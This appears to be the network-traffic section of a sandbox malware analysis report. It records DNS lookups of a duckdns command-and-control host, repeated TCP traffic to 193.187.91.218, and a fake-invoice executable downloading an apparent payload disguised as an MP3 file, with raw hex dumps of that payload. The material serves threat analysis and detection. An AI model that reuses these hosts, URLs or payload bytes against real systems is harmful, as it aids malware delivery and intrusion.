Jan 3, 2025 01:52:20.302042007 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:52:41.288005114 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:52:41.292926073 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:52:41.292999983 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:52:41.298110008 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:52:41.714683056 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:52:41.803342104 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:52:41.949301004 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:52:41.953488111 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:52:41.958267927 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:52:41.958424091 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:52:41.963201046 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:52:43.569405079 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:52:43.574168921 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:52:43.574217081 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:52:43.579022884 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:52:44.020692110 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:52:44.116132975 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:52:44.200018883 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:52:44.202264071 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:52:44.207046986 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:52:44.207159042 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:52:44.211997986 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:52:44.272449017 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:52:44.277257919 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:52:44.277321100 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:52:44.282355070 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:52:44.710010052 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:52:44.714782953 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:52:44.714936018 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:52:44.719729900 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:52:44.883594990 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:52:45.016895056 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:52:45.016942978 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:52:45.019037008 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:52:45.023840904 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:52:45.023881912 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:52:45.028609037 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:52:45.194313049 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:52:45.203794956 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:52:45.208595037 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:52:45.208635092 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:52:45.213409901 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:52:46.835586071 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:52:46.840409994 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:52:46.840536118 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:52:46.845325947 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:52:47.343132019 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:52:47.412722111 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:52:47.521975040 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:52:47.528510094 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:52:47.533349037 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:52:47.533399105 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:52:47.538258076 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:05.022519112 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:05.027406931 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:05.027450085 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:05.032212019 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:07.064455032 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:07.167139053 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:07.423197031 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:07.425684929 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:07.430495977 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:07.430555105 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:07.435463905 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:16.366301060 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:16.371292114 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:16.372287989 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:16.377094030 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:16.840805054 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:16.992382050 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:17.030596018 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:17.033196926 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:17.038064957 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:17.038110018 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:17.042934895 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:40.370260954 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:40.375154972 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:40.375272989 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:40.380080938 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:41.007211924 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:41.115978003 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:41.195010900 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:41.197345018 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:41.202229023 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:41.202280045 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:41.207119942 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:44.506887913 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:44.511785984 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:44.511909962 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:44.516642094 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:45.243165016 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:45.411153078 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:45.433254004 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:45.435328960 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:45.440109015 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:45.440145016 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:45.444999933 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:54.834997892 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:54.839941025 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:54.842420101 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:54.847172022 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:55.349442959 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:55.412882090 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:55.616517067 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:55.621408939 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:55.621469021 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:55.626292944 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:55.672070026 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:55.673846960 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:55.678663015 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:55.678759098 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:55.683497906 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:56.289392948 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:56.412916899 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:56.487652063 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:56.490314960 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:56.495106936 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:56.495223999 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:56.500055075 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:57.366305113 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:57.371387005 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:57.371429920 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:57.376230001 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:58.106123924 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:58.304980040 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:58.308319092 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:58.312284946 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:58.317053080 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:53:58.320350885 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:53:58.325167894 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:54:00.569446087 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:54:00.574470043 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:54:00.574624062 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:54:00.579386950 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:54:00.870222092 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:54:00.916261911 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:54:01.057117939 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:54:01.104324102 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:54:02.464425087 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:54:02.469549894 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:54:02.472316027 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:54:02.477449894 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:54:03.240618944 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:54:03.319158077 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:54:03.414410114 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:54:03.415380001 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:54:03.420197964 CET	50787	49736	193.187.91.218	192.168.2.4
Jan 3, 2025 01:54:03.420243979 CET	49736	50787	192.168.2.4	193.187.91.218
Jan 3, 2025 01:54:03.425074100 CET	50787	49736	193.187.91.218	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2025 01:49:53.938885927 CET	52733	53	192.168.2.4	1.1.1.1
Jan 3, 2025 01:49:54.545659065 CET	53	52733	1.1.1.1	192.168.2.4
Jan 3, 2025 01:50:13.102626085 CET	60347	53	192.168.2.4	1.1.1.1
Jan 3, 2025 01:50:14.209120989 CET	60347	53	192.168.2.4	1.1.1.1
Jan 3, 2025 01:50:14.400196075 CET	53	60347	1.1.1.1	192.168.2.4
Jan 3, 2025 01:50:14.400206089 CET	53	60347	1.1.1.1	192.168.2.4
Jan 3, 2025 01:50:26.741612911 CET	65280	53	192.168.2.4	1.1.1.1
Jan 3, 2025 01:50:26.842427015 CET	53	65280	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 3, 2025 01:49:53.938885927 CET	192.168.2.4	1.1.1.1	0x6e53	Standard query (0)	www.chirreeirl.com	A (IP address)	IN (0x0001)	false
Jan 3, 2025 01:50:13.102626085 CET	192.168.2.4	1.1.1.1	0x32b5	Standard query (0)	pureeratee.duckdns.org	A (IP address)	IN (0x0001)	false
Jan 3, 2025 01:50:14.209120989 CET	192.168.2.4	1.1.1.1	0x32b5	Standard query (0)	pureeratee.duckdns.org	A (IP address)	IN (0x0001)	false
Jan 3, 2025 01:50:26.741612911 CET	192.168.2.4	1.1.1.1	0x4f19	Standard query (0)	pureeratee.duckdns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 3, 2025 01:49:54.545659065 CET	1.1.1.1	192.168.2.4	0x6e53	No error (0)	www.chirreeirl.com	chirreeirl.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 3, 2025 01:49:54.545659065 CET	1.1.1.1	192.168.2.4	0x6e53	No error (0)	chirreeirl.com		209.58.149.225	A (IP address)	IN (0x0001)	false
Jan 3, 2025 01:50:14.400196075 CET	1.1.1.1	192.168.2.4	0x32b5	No error (0)	pureeratee.duckdns.org		193.187.91.218	A (IP address)	IN (0x0001)	false
Jan 3, 2025 01:50:14.400206089 CET	1.1.1.1	192.168.2.4	0x32b5	No error (0)	pureeratee.duckdns.org		193.187.91.218	A (IP address)	IN (0x0001)	false
Jan 3, 2025 01:50:26.842427015 CET	1.1.1.1	192.168.2.4	0x4f19	No error (0)	pureeratee.duckdns.org		193.187.91.218	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.chirreeirl.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	209.58.149.225	443	7660	C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 00:49:55 UTC	222	OUT	GET /wp-panel/uploads/Wlvdlivs.mp3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Host: www.chirreeirl.com Connection: Keep-Alive
2025-01-03 00:49:55 UTC	210	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 00:49:55 GMT Server: Apache Last-Modified: Thu, 02 Jan 2025 18:16:45 GMT Accept-Ranges: bytes Content-Length: 1262600 Connection: close Content-Type: audio/mpeg
2025-01-03 00:49:55 UTC	7982	IN	Data Raw: 0c da 08 45 20 57 84 8a 02 40 d1 79 5a 3a 6b c6 b1 be 7e a2 c3 d8 bb e1 0f 22 ca e1 14 d4 ad 7c 96 ba 37 91 55 31 69 b0 28 e1 85 79 93 6a 5e 7f 04 41 e3 13 f7 11 f1 17 87 f0 26 41 69 3b c3 0d 2e 87 4f 08 47 a9 ed e1 b7 a4 3a 6c b2 0e f1 b9 73 7b f9 1c 5d 77 4f 28 71 0d 97 3f 48 1b 91 97 59 68 26 ad b2 fb bf 3a 1d d3 9d 2f 48 1a 9c 75 e1 ee ba 37 fc f2 61 dc e5 b3 11 b8 f7 8c 83 b5 cf 48 48 13 50 16 5c 64 b1 74 5f 92 12 1c f2 97 2d a0 45 0d 40 4a 15 cc b1 b7 02 48 a6 1d d7 2e 3f 68 88 80 57 d4 b9 e2 f9 4f 5c ed c3 a4 84 e7 53 64 d2 e5 f0 0c 69 a3 f0 d8 3b ea b2 e0 73 07 9d 12 c7 c3 e4 f3 77 52 d7 da d3 a4 ca 22 fb 62 90 da ed 71 e5 1f 5e 01 d5 38 41 a9 c2 1f e1 06 6b 57 a0 e9 77 33 b8 a6 bd 82 93 66 88 ff be 61 32 92 42 da d3 d6 b4 5d 74 f8 f6 df c0 6b ac Data Ascii: E W@yZ:k~"\|7U1i(yj^A&Ai;.OG:ls{]wO(q?HYh&:/Hu7aHHP\dt_-E@JH.?hWO\Sdi;swR"bq^8AkWw3fa2B]tk
2025-01-03 00:49:55 UTC	8000	IN	Data Raw: 0e 8d f6 28 f2 64 49 4f 3c 88 2f 45 4b f2 dc 9b 4f 8c bc 5c ac c5 96 b7 5e 29 ad 5b 87 f7 31 e0 d6 a0 4a 23 e7 2a 3b ae d7 86 6e 4d be f1 09 8c 3c f7 be ac dd cc f6 b5 3b 59 fc ba ea 20 8a a5 8e 37 aa 49 da 95 6a e8 2d c5 d2 0a fc 61 62 f4 d2 c6 9b e6 89 2a a0 fc 51 aa cc 80 9b ce e4 15 2f c7 2b 0f c8 ce 8a 3c 41 d0 ed 47 59 3a 58 89 49 d7 05 83 35 bc 7b 61 bf e9 b1 88 6b d7 c5 c2 18 5d 70 c3 51 5a 49 05 9c e1 5d 43 c2 6e 4a d0 6c 1a e9 da e1 44 2e 8f cd 53 c5 f8 5a c8 48 e7 10 e3 68 43 ce 7c 0b 51 0e 56 5c d3 2c 87 7b a7 c0 b5 dd b9 a2 8f ce 7f bf 11 10 fd 7a 01 d6 04 01 d2 c5 03 27 12 32 03 72 3a 6e cf 8d a1 1f 44 b8 42 60 9e 69 84 ab ed f3 f4 89 18 9f e9 b9 4c 63 43 10 cb 10 73 18 41 c1 94 19 04 8c 05 34 bd b2 4a 3a 5a a0 c0 07 20 16 20 cb 66 de d0 78 Data Ascii: (dIO</EKO\^)[1J#;nM<;Y 7Ij-abQ/+<AGY:XI5{ak]pQZI]CnJlD.SZHhC\|QV\,{z'2r:nDB`iLcCsA4J:Z fx
2025-01-03 00:49:55 UTC	8000	IN	Data Raw: 21 4d 2d ea 1f 87 b9 54 b6 3c 26 8d 02 15 9d 0a 83 b7 27 93 09 d5 ec 58 1a a2 08 56 e1 94 31 f3 d9 58 3b 55 2f b6 d3 25 e9 84 da 5d 37 a5 e8 e9 5f 34 a1 49 e9 de 14 dc d1 3a 32 ee d5 79 62 23 eb 2b 1b 7e 84 1d ab 73 22 0a e2 a7 2b 44 5e 20 0d 08 81 16 df fe c0 cd 1d 0c 78 28 d1 a3 83 27 4d 2d 49 9d 71 91 00 ad e2 a7 0b c6 61 7e e9 17 f2 77 4f 92 57 34 18 09 d4 27 48 27 94 af 95 8b d4 03 f1 99 96 9c a3 0c b1 67 60 74 89 a9 65 1f 90 51 79 0e c6 48 1f 8c 4b 87 0c 67 ff ff 6d 18 e3 e5 3b c8 f9 0c 1a 65 ea 8e b5 92 66 87 d9 58 94 70 54 74 6d b9 44 d9 4d 13 80 9a 47 88 5e dc 86 e7 a5 76 b3 48 ba 94 54 82 7a 63 67 43 6e 3c 7b f8 27 3e 3d 35 d4 27 c6 eb 83 f0 d7 2a dd 02 f5 af 9c 2e 6e c4 db 8f 4f 49 e9 8c 07 39 76 0c 81 2c 5a 6e 95 95 d4 30 2a e3 3f eb 40 ad e8 Data Ascii: !M-T<&'XV1X;U/%]7_4I:2yb#+~s"+D^ x('M-Iqa~wOW4'H'g`teQyHKgm;efXpTtmDMG^vHTzcgCn<{'>=5'.nOI9v,Zn0?@
2025-01-03 00:49:55 UTC	8000	IN	Data Raw: 5f 2d c6 9c 24 54 3d d2 29 13 48 1f 83 e6 3f 03 03 f0 dc 6f 04 81 c5 86 f4 9e a3 11 f5 6f d8 22 6d b2 0d cd fb b6 0a 0c 7b 7a 38 77 5b 21 0e 43 35 ad dd f5 be 47 4a 33 49 9a a8 16 8e e5 38 13 97 78 da a7 76 d2 de 25 7c db 71 b2 e5 d2 5e a0 ff be 38 a4 82 7e aa 76 7d df 2f f7 e4 c1 8a f8 20 78 a2 f2 0e 26 11 c7 82 42 d5 47 a7 5f 86 b2 f4 de ac 0a 26 d3 a2 73 33 bf f1 2f 06 f2 f5 68 b0 64 96 5d 34 5c 03 8d be 59 1b 89 74 11 e8 4d f5 10 5a 57 9a 03 bc f5 b8 27 b6 51 99 b3 f6 f4 e9 5b f6 f0 c4 12 f0 7e b8 83 6d 63 0a 52 80 40 cd 43 1e 05 0b 13 24 e9 f4 7d 7e 00 0d 0b c1 be 85 37 ba 13 39 8f c0 d2 76 80 f9 ac 37 1d d1 44 05 37 7a 96 98 49 9d e3 b2 83 59 d7 30 fc 1c 95 df d5 92 e3 a9 d2 74 c0 02 ca 85 b3 04 db b3 b0 7c 65 83 90 aa ba 7a 01 99 a5 ca 0e 05 e9 07 Data Ascii: _-$T=)H?oo"m{z8w[!C5GJ3I8xv%\|q^8~v}/ x&BG_&s3/hd]4\YtMZW'Q[~mcR@C$}~79v7D7zIY0t\|ez
2025-01-03 00:49:55 UTC	8000	IN	Data Raw: 69 fc d7 4d 05 10 7f 07 ee 4c 38 e9 a9 4a 9b 14 e1 7d 2c df 77 3b 27 7e 2b 2f 44 c5 68 8b da d1 95 44 fd 40 28 d0 93 e0 ef 76 67 62 3a cd f1 55 0a 61 46 6c 7d 3f 37 e8 64 41 f8 5b 42 be 9f 0d 6e 1f 5d 84 2a 65 d1 d8 8c 85 21 e9 d8 eb 7a b7 bd de 6f 04 a3 ad 76 62 3b 55 21 7d e7 f4 6b 22 35 cc b1 d1 1f 4a 94 cc 33 2d 1a a3 5e 0e b0 70 d4 82 2f fe 8f a7 a0 04 30 3c e4 47 ea 59 9b 91 2e eb ce 22 54 ee 93 d5 43 38 a0 de b2 d0 79 52 be cb a7 b7 59 d1 2c 47 00 3f fe 2c d9 b2 c5 62 33 b8 63 c2 9d 32 f3 0c eb 99 a6 0b d6 ab 56 66 18 54 6f 53 c2 27 73 c0 36 c8 25 9a a7 d4 39 48 5c 4b b1 0e 1d 24 84 ef db f7 35 8a f2 ef 8a a9 4c 2d a8 09 d6 32 10 61 6d 53 14 9d e8 98 16 30 6a f7 36 e2 e0 b1 1e 47 0d f8 42 bf ae 1f 9c ec f8 ee 43 fd 26 9a 04 f2 a4 fb 1c 3d 7f 92 28 Data Ascii: iML8J},w;'~+/DhD@(vgb:UaFl}?7dA[Bn]*e!zovb;U!}k"5J3-^p/0<GY."TC8yRY,G?,b3c2VfToS's6%9H\K$5L-2amS0j6GBC&=(
2025-01-03 00:49:55 UTC	8000	IN	Data Raw: af 62 b5 07 93 0e 92 d9 94 b6 93 68 79 fa ab 5d 10 7a 21 80 6f b0 04 1f 38 d0 80 63 ce 64 1d ed f6 31 78 28 aa 69 f5 01 89 5e 6c ca e6 d5 b8 91 16 9c 13 b8 4d 6f 63 2c 68 e4 55 c8 c8 9b 40 8d 0a 28 25 37 ce 93 d6 eb 6b 5c 16 fc a8 eb be 6b f6 da 50 6d 6f b9 5a 88 cb 77 1f ea 4d 49 12 12 89 97 80 d6 cb e0 c5 c6 b5 54 55 45 01 13 45 6f 9b 8b 32 b6 3a 9b 2f d0 e9 23 3d fc eb 18 93 48 6d ad f3 21 b1 a7 c4 c5 43 00 c5 7f a2 62 13 3f 2f b1 e2 b5 d8 ec 39 5e 14 ed f0 f8 43 a3 65 fa 5e fa 86 05 55 1c ce 5c 36 57 f4 0b 0e 1a bb ea 31 6a 29 6f 81 4d ec cd a2 b5 aa 8d 30 9f 1e 16 98 a2 91 e0 11 48 0e ff ed bd f6 fb 14 21 65 b2 05 14 f5 3f 38 9c 1c 77 49 7e 43 69 36 d5 fa 46 e8 7c ef 87 9f 2a 48 97 11 fe 93 2c c7 31 8c 43 47 06 4f 4b 2d 2b cd 53 a5 52 88 a1 d6 83 ea Data Ascii: bhy]z!o8cd1x(i^lMoc,hU@(%7k\kPmoZwMITUEEo2:/#=Hm!Cb?/9^Ce^U\6W1j)oM0H!e?8wI~Ci6F\|*H,1CGOK-+SR
2025-01-03 00:49:55 UTC	8000	IN	Data Raw: b9 6b e6 31 e8 9b 88 e5 ea 3c 03 62 d8 f1 e5 9f 77 c2 6d 47 f7 4c 12 63 c9 4a 07 19 21 d3 1e 48 09 9a 96 bb 58 74 aa 2c 76 72 ce 8c 8c 33 21 79 ba bf 7d cc 92 77 b1 8f dd d7 15 c1 3c 31 5f fc 90 9a 3d 4a 32 72 c9 6f 6d d3 40 c8 ad 34 69 ff 5d e6 60 79 4a 8e ee 59 90 7b 1c b5 2c 23 ba bf 29 87 b0 29 05 79 19 70 71 c7 1f e7 66 d4 b8 36 4e f8 cd 86 d3 c5 e3 19 77 a3 6d 9f aa fb cd 89 85 6c 9f cd 20 6b 83 9e 93 b3 04 a7 df 94 34 89 a2 33 92 93 6e 7c 0d fc 95 02 c0 4c 5e b2 69 c8 ef 5c 6b b7 c1 4b 8b aa e4 d4 aa 11 ad 4b f0 c0 72 e6 e0 b8 6d d2 d7 ca f3 15 e7 bc cf 03 39 09 1e 5a 4b 94 be 71 22 99 4a f6 90 6f 8b 10 b7 01 c5 69 2c ab a1 03 cc 29 18 d5 b9 99 33 a4 12 36 7d 47 a4 a7 96 43 9d 98 cf 70 bb c3 ea cb 51 ec 0a 67 e2 6b 32 b6 f0 0c 93 67 9a 86 c0 4f b5 Data Ascii: k1<bwmGLcJ!HXt,vr3!y}w<1_=J2rom@4i]`yJY{,#))ypqf6Nwml k43n\|L^i\kKKrm9ZKq"Joi,)36}GCpQgk2gO
2025-01-03 00:49:55 UTC	8000	IN	Data Raw: 60 25 52 7c 03 b1 78 52 56 47 d4 03 34 37 b9 be 6b 5f 32 54 69 33 e0 b4 f5 23 38 2b 7b 69 3d 7f 38 27 bb 18 74 eb 83 76 71 98 1a 9d 6a 2b 76 7a c4 7d df 1c 69 04 ad 29 09 38 62 fb f4 c2 65 d1 b1 48 4f d2 c5 fe aa 4f d1 a4 2d be e5 17 80 04 aa a9 46 65 f0 e0 12 f5 11 96 81 f3 d6 c2 46 d4 1d d0 e1 7e 41 c7 04 de 13 de 02 e4 86 b2 b8 30 74 e4 a8 6f 02 a7 b9 a4 62 c2 97 ba 58 de d0 a7 0c 23 09 6b 79 bc 21 55 28 e3 e9 bd 92 b3 58 ed ba a8 3e ec 38 00 c0 ca 84 60 b9 f6 c3 a7 6e 99 66 4a 50 aa 7a a8 ff 74 51 f4 af eb ff 71 e4 e8 86 05 c0 3d c0 c3 8a ea 52 c1 00 a9 0c f5 34 ff 66 e6 c9 51 5a ec 8f 2a 32 4b 15 a5 b7 75 d6 a8 25 1e 26 a5 7c ea b7 28 e5 5e c2 fc 4b 5c 64 ae 8f ec cb aa 7f 8d f6 2f f8 fe 16 f0 bd d4 4e 5b d7 52 e9 a4 d9 31 89 ba 73 57 c9 57 ce 40 5e Data Ascii: `%R\|xRVG47k_2Ti3#8+{i=8'tvqj+vz}i)8beHOO-FeF~A0tobX#ky!U(X>8`nfJPztQq=R4fQZ*2Ku%&\|(^K\d/N[R1sWW@^
